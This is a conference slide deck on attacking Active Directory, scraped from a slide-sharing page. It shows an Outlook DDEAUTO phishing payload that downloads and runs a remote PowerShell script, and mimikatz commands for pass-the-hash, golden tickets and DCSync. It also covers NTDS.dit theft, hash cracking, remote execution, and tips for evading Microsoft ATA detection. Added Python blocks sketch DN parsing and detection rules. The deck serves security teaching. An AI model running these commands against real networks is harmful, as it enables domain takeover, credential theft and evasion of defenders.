PENTESTING
ACTIVE DIRECTORY
Carlos García García
ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book “Hacking Windows: Ataques a sistemas y redes Microsoft”
WHAT ARE WE GOING TO TALK ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
BEAR IN MIND
- AD-related techniques only
- I learned Active Directory from the offensive side
- We lower risk, not the other way around
- This is going to be intense
ACTIVE DIRECTORY 101
• AD is Microsoft’s answer to directory services
• Directory service is a hierarchical structure to store objects for
quick access and management of all resources
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate
domain controllers through DNS queries
• AD supports several Naming Conventions
• User Principal Names (UPN):
• user@domain
• LDAP names (Distinguished Names):
• cn=common name
• ou=organizational unit
• dc=domain
• e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
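An added example, not code from the deck: a small RFC 4514 distinguished-name parser that derives the DNS domain and the default UPN from a DN, the two naming conventions listed above. EXAMPLE_DN is the slide's own example; ESCAPED_DN (a CN containing an escaped comma) is constructed to show why a naive split on commas is not enough.

```python
# Added example, not from the deck: RFC 4514 DN parsing, with the escaping rules
# that a naive split(",") ignores, mapped onto the UPN/DNS naming the slide lists.
from typing import List, Tuple

EXAMPLE_DN = "cn=ciyi, ou=Madrid, dc=Rooted, dc=CON"          # the slide's example
ESCAPED_DN = r"cn=Garcia\, Carlos,ou=Madrid,dc=Rooted,dc=CON"   # constructed


def parse_dn(dn: str) -> List[Tuple[str, str]]:
    """Split a DN into (attribute, value) pairs.

    A backslash escapes the next special character ("\\," keeps a comma inside a
    value) or introduces a two-hex-digit escape such as "\\2c"; multi-byte UTF-8
    hex escapes are not reassembled here. Whitespace around values is dropped.
    """
    pairs, attr, buf, in_value, i = [], "", [], False, 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):
            nxt = dn[i + 1]
            if nxt in ',=+<>#;"\\ ':
                buf.append(nxt)
                i += 2
            else:
                buf.append(chr(int(dn[i + 1:i + 3], 16)))
                i += 3
            continue
        if not in_value and ch == "=":
            attr, buf, in_value = "".join(buf).strip(), [], True
        elif in_value and ch == ",":
            pairs.append((attr, "".join(buf).strip()))
            buf, in_value = [], False
        else:
            buf.append(ch)
        i += 1
    if in_value:
        pairs.append((attr, "".join(buf).strip()))
    return pairs


def dn_domain(dn: str) -> str:
    """The dc= components, in order, spell the DNS name of the domain."""
    return ".".join(value for attr, value in parse_dn(dn) if attr.lower() == "dc")


def upn_from_dn(dn: str, sam_account_name: str) -> str:
    """Default UPN: logon name @ DNS domain. AD also allows alternative UPN
    suffixes, so a real account's UPN may carry a different suffix."""
    return f"{sam_account_name}@{dn_domain(dn)}"


if __name__ == "__main__":
    print(parse_dn(EXAMPLE_DN), dn_domain(EXAMPLE_DN), upn_from_dn(EXAMPLE_DN, "ciyi"))
```

The parser is what you want behind any tooling that turns LDAP search results into hostnames or logon names: the dc= chain is the only reliable way to get the domain DNS name from an object, and escaped commas inside a CN are common for real user objects ("Surname, Name").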
• Just a database: NTDS.dit
• Domain Controllers and Domain Admins
CREDENTIALS FLOW IN WINDOWS
NTLM SCHEME
Protocol   Algorithm   Secret used
LM         DES-ECB     LM hash
NTLMv1     DES-ECB     NT hash
NTLMv2     HMAC-MD5    NT hash
KERBEROS SCHEME
Protocol   Encryption type   Secret used
Kerberos   RC4-HMAC          NT hash (the RC4 key is the NT hash itself)
Kerberos   AES128            AES128 key
Kerberos   AES256            AES256 key
1. The client encrypts a timestamp with its hash/key (pre-authentication).
2. The client receives a TGT encrypted with the key of the domain krbtgt account; the TGT is what proves the client is who it says it is.
3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain.
4. The DC sends back a TGS ticket encrypted with the hash/key of the account associated with that service (SPN).
PENTESTING ACTIVE DIRECTORY: Sure, but how about actually pentesting it?
ACTIVE DIRECTORY PENETRATION TESTING
The Goal
• Domain admins
• Enterprise admins
• Built-in administrators
• Account Operators
• Allowed RODC Password
Replication Group
• Backup Operators
• DnsAdmins
• …
The real Goal!
ATTACK KILL CHAIN
Reference: Microsoft Advanced Threat Analytics
PENTESTING ACTIVE DIRECTORY: Infrastructure
PENTESTING ACTIVE DIRECTORY: Classic Intrusion Scheme
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data
between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less Malware
DDEAUTO
"C:ProgramsMicrosoftOffice365Outlook........windowssystem
32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden
$e=(New-Object
System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-
test.ps1');powershell -e $e # " "Beneficios Qurtuba"
NEXT STEPS
• Persistence (userland)
• Reconnaissance
• Privilege escalation
• PowerSploit PowerUp
• Bypass UAC
• …
• Persistence (admin)
• Lateral and vertical movements
• Grab and exfiltrate trophies
PENTESTING ACTIVE DIRECTORY: Reconnaissance
LOCAL RECONNAISSANCE
Collect information about the network, the processes and the OS to find out what kind of machine we have landed on.
• ipconfig /all: IP address, subnet mask and default gateway of every adapter, plus DHCP and DNS settings
• whoami /all: everything in the current access token: user name, SIDs, privileges and the groups the user belongs to
• net localgroup: name of the host and its local groups
• net localgroup "administrators": local administrators
• netstat -an: active TCP connections, listening ports, Ethernet statistics and the IP routing table
• tasklist /V: running applications and services with their PID, on the local or a remote host
• net start: started Windows services
• sc qc <SERVICE>: configuration parameters of one service
• accesschk.exe -ucqv <SERVICE>: access control rules of a service (accesschk.exe is part of the Microsoft Sysinternals suite)
• systeminfo > info_output.txt: detailed configuration of the computer and its OS: OS configuration, security information, product ID and hardware properties such as RAM, disk space and network cards
• schtasks /query /fo LIST /v: scheduled tasks: whether they recur, where the task lives, its parameters and, crucially, which account they run as
• dir, type, findstr: browse and search the local file system
NETWORK RECONNAISSANCE
Collect information about the domain the host is joined to and about the machines and accounts around it.
• ping ☺
• echo %USERDOMAIN%: domain the host is joined to
• echo %logonserver% (or set logonserver): Domain Controller the host authenticated against
• net group /domain: groups in the domain
• net group "<GROUP NAME>" /domain: members of a group, e.g. "domain computers", "domain controllers", "domain admins"
• net localgroup administrators /domain: members of the built-in group "Administrators"
• net user /domain: all users in the current domain
• net user <ACCOUNT NAME> /domain: detailed information about one user
• net view: domains, computers or resources shared by the specified computer; without parameters, the computers in the current domain
• net use: access shared resources
• net accounts /domain: domain password policy
• nltest /domain_trusts: trust relationships
PENTESTING ACTIVE DIRECTORY: Common Attacks & Techniques
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing patches: exploit MS14-068 on a DC missing the patch – 5%
• Kerberos TGS service ticket cracking (Kerberoast) – 20%
• SMB shares mining – 75%
• Credential theft shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
KERBEROAST
• Offline brute force of the service account's password, using the service ticket (TGS) that was encrypted with it
• Low detection risk: requesting a service ticket is normal client behaviour and the cracking happens offline (the RC4 ticket requests do land in event 4769 on the DC, though)
• No account lockouts
• Invoke-Kerberoast from PowerView (dev branch) to collect the hashes
• Focus on user accounts with an SPN: they have human-chosen, shorter passwords, while computer accounts have long random ones
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerate the shares in the environment and look for data with hard-coded creds (scripts, config files), backups, documentation…
PowerView Find-DomainShare
• Searches for computer shares on the domain. If -CheckShareAccess is passed, only shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates SMB shares across an entire domain: lists drives, permissions and contents, uploads/downloads files, auto-downloads files whose names match a pattern, etc.
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
CREDENTIAL THEFT SHUFFLE (“Mimikatz dance”)
• Escalate privileges on some machine
• Extract creds/hashes from memory
• Derivative administrator: the harvested creds make us admin on further machines
• User hunting: move laterally and repeat the attack until Domain Admin level is reached
References:
https://github.com/gentilkiwi/mimikatz
USER HUNTING
List local admins remotely
• Get-localadmin (script)
• Get-NetLocalGroup (PowerView)
List active sessions remotely
• PsLoggedon (Sysinternals)
• Get-NetLoggedon (PowerView)
• Get-NetSession (PowerView)
• tasklist /V (against a remote host with /S; the user column reveals who is logged on)
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://docs.microsoft.com/en-us/sysinternals/
https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets the groups and the members of each group
2. Lists the domain computers
3. Obtains the local admins of each computer
4. Lists the active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
Creds dump + Privs escalation
NTLM RELAY
PASS-THE-HASH
The NT hash is the secret on both sides of NTLMv1/v2 (see NTLM SCHEME above): whoever holds it can authenticate as the user without ever knowing the password.
OVERPASS-THE-HASH (PASS-THE-KEY)
• The Kerberos variant of pass-the-hash: the NT hash (RC4 key) or the AES key is used as the Kerberos secret to obtain a TGT, and from the TGT service tickets
Reference:
http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
PASS-THE-TICKET
• Inject Kerberos tickets into the current logon session
• Tickets must be in Kerberos credential format (KRB_CRED), see http://tools.ietf.org/html/rfc4120#section-5.8
• The kerberos module does not require any privilege: it uses the official Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
GOLDEN TICKET
(diagram: the attacker holds the krbtgt hash and forges a TGT, encrypted with the KRBTGT hash, containing an arbitrary username and group membership)
The KRBTGT hash can be used to generate arbitrary TGTs:
• Made by the attacker, not by the KDC
• Anything can be pushed inside (user, groups, …)
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
DCSYNC
• “Impersonates” a Domain Controller and requests account password data from the targeted Domain Controller
• Replicates the credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync: Replicating Directory Changes and Replicating Directory Changes All, which Domain Admins, Enterprise Admins and Domain Controllers hold by default
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
DCSHADOW
Registers a rogue domain controller and pushes malicious AD objects or attribute changes through normal replication, creating backdoors or any other kind of illegitimate access or right
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
PENTESTING ACTIVE DIRECTORY: dir is boring, show me how to RCE
REMOTE CODE EXECUTION
AT
at \\TARGET_HOST HH:MM EXECUTABLE
Schtasks
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST
SC
sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
sc \\TARGET_HOST start SERVICE_NAME
WMIC
wmic /node:TARGET_HOST process call create "EXECUTABLE"
WinRM
Invoke-Command -ComputerName TARGET_HOST -ScriptBlock { COMMAND(S) }
PsExec
PsExec.exe \\TARGET_HOST -u USER PROCESS
PENTESTING ACTIVE DIRECTORY: Let’s grab the NTDS.dit DB
NTDS.DIT
How to get the hashes out of it:
1. Decrypt the Password Encryption Key (PEK). The PEK is encrypted with the bootkey, which lives in the SYSTEM hive
2. First decryption round of the hashes: RC4, keyed with the PEK
3. Second decryption round: DES, keyed from the account RID
GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
vssadmin create shadow /for=C:
Ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Invoke-NinjaCopy
Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
CRACKING NT HASHES
John the Ripper
john FILE_HASHES --format=NT
Hashcat & rockyou wordlist
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot
PENTESTING ACTIVE DIRECTORY: But how about the blue team? Microsoft ATA
MICROSOFT ATA
PASS-THE-HASH
• Detection is based on local Security events
• Not captured by ATA by default
• Force NTLM to be used
• Overpass-the-hash: the encryption downgrade (RC4 instead of AES) is detected, so pass the AES keys as well
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
GOLDEN TICKET
• Same as overpass-the-hash: the encryption downgrade is detected, so pass the AES keys too
• Detection based on ticket lifetime
• The default ticket lifetime in AD is 10 hours (renewable for 7 days), so forge a ticket that respects the policy instead of mimikatz's 10-year default
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
DCSYNC
DRS replication traffic (DSGetNCChanges) from a system that is not a DC towards a DC can be detected
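An added example, not code from the deck or from Microsoft ATA: the three detections the blue-team slides describe (ticket lifetime beyond policy, encryption downgrade to RC4, replication rights exercised by a non-DC), written as rules over constructed observations. ATA takes these from mirrored DC traffic; the DCSync rule is also reachable from Security event 4662, whose Properties field lists the control-access-right GUIDs below. Host and account names, timestamps and the policy values are constructed or the AD defaults; the evasive ticket mirrors the kerberos::golden options on the slide.

```python
# Added example, not from the deck: the three ATA detections these slides
# discuss, as rules over constructed observations. Names and times are made up;
# policy values are the AD defaults.
from dataclasses import dataclass
from datetime import datetime, timedelta

MAX_TICKET_AGE = timedelta(hours=10)   # "Maximum lifetime for user ticket" default
MAX_RENEW_AGE = timedelta(days=7)      # "Maximum lifetime for user ticket renewal" default
RC4_HMAC = 23                          # etype issued when only the NT hash is supplied


@dataclass
class Ticket:
    client: str
    etype: int
    starttime: datetime
    endtime: datetime
    renew_till: datetime


@dataclass
class Account:
    name: str
    has_aes_keys: bool   # msDS-SupportedEncryptionTypes allows AES


def ticket_alerts(ticket: Ticket, account: Account):
    alerts = []
    # Lifetime check: mimikatz's kerberos::golden default is a 10-year ticket
    if ticket.endtime - ticket.starttime > MAX_TICKET_AGE:
        alerts.append("ticket lifetime exceeds domain policy")
    if ticket.renew_till - ticket.starttime > MAX_RENEW_AGE:
        alerts.append("renewable lifetime exceeds domain policy")
    # Encryption downgrade: an AES-capable account suddenly on RC4 is what
    # sekurlsa::pth or kerberos::golden produce when given only /ntlm or /krbtgt
    if account.has_aes_keys and ticket.etype == RC4_HMAC:
        alerts.append("encryption downgrade to RC4-HMAC")
    return alerts


# Control-access-right GUIDs that DRSGetNCChanges needs; event 4662 lists the
# ones exercised in its Properties field.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes-All
}


def dcsync_alert(subject: str, properties, domain_controllers):
    """Replication rights exercised by anything but a DC computer account."""
    used = DS_REPLICATION_GUIDS & {p.strip("{}").lower() for p in properties}
    dcs = {d.upper() for d in domain_controllers}
    is_dc = subject.endswith("$") and subject[:-1].upper() in dcs
    if used and not is_dc:
        return f"{subject} exercised replication rights {sorted(used)} (possible DCSync)"
    return None


# Constructed observations
NOW = datetime(2018, 3, 2, 10, 0)
CIYI = Account("ciyi", has_aes_keys=True)
DCS = {"DC01"}
POLICY_TGT = Ticket("ciyi", 18, NOW, NOW + timedelta(hours=10), NOW + timedelta(days=7))
MIMIKATZ_DEFAULT = Ticket("ciyi", RC4_HMAC, NOW, NOW + timedelta(days=3650), NOW + timedelta(days=3650))
# AES keys plus /endin:600 /renewmax:10080, as on the slide: nothing to flag
EVASIVE_GOLDEN = Ticket("ciyi", 18, NOW, NOW + timedelta(minutes=600), NOW + timedelta(minutes=10080))
SAMPLE_4662_PROPERTIES = ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                          "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]

if __name__ == "__main__":
    print(ticket_alerts(MIMIKATZ_DEFAULT, CIYI), ticket_alerts(EVASIVE_GOLDEN, CIYI))
    print(dcsync_alert("ciyi", SAMPLE_4662_PROPERTIES, DCS))
```

The evasive ticket trips neither rule, which is exactly the deck's point: a golden ticket forged with the AES keys and policy-conformant lifetimes is indistinguishable from a legitimate TGT by these two heuristics alone, so treat them as a floor and pair them with the DCSync rule, which fires on the step an attacker must take to obtain the krbtgt keys in the first place.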
PENTESTING ACTIVE DIRECTORY: Wrapping Up
• Plaintext creds: WDigest, SMB mining, mimikittenz, LaZagne, WCMDump
• Hashes: memory dump, …
• Run as, NTLM relay, pass-the-hash, pass-the-ticket, golden ticket: all of them end in a logon session with an access token (user SID, group SIDs, logon SID, …)
• Remote execution: PsExec, WinRM, AT, Schtasks, WMIC, SC
• DCSync, DCShadow, golden ticket, SMB mining
• NTDS.dit: Volume Shadow Copy, Ntdsutil, Invoke-NinjaCopy; DSInternals, Impacket secretsdump; crack the hashes
• Persistence: golden ticket, skeleton key, ACL-based backdoors, malicious SSP, password filters, …
BUSINESS RISK
Compromise of just one Domain Admin account in Active Directory exposes the entire organization. The attacker gets unrestricted access to every resource managed by the domain: all users, servers, workstations and data.
Moreover, the attacker can instantly establish persistence in the Active Directory environment, which is hard to notice and cannot be remediated efficiently or with any guarantee.
“Once domain admin, always domain admin”
ACKNOWLEDGMENTS & REFERENCES
• Miroslav Sotak and the TVM team
• FWHIBBIT
• RootedCON and every other security community in Spain
Questions? Answers
ciyinet
carlos@ciyi.es
ciyinet@protonmail.com
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

Plus de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Dernier

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
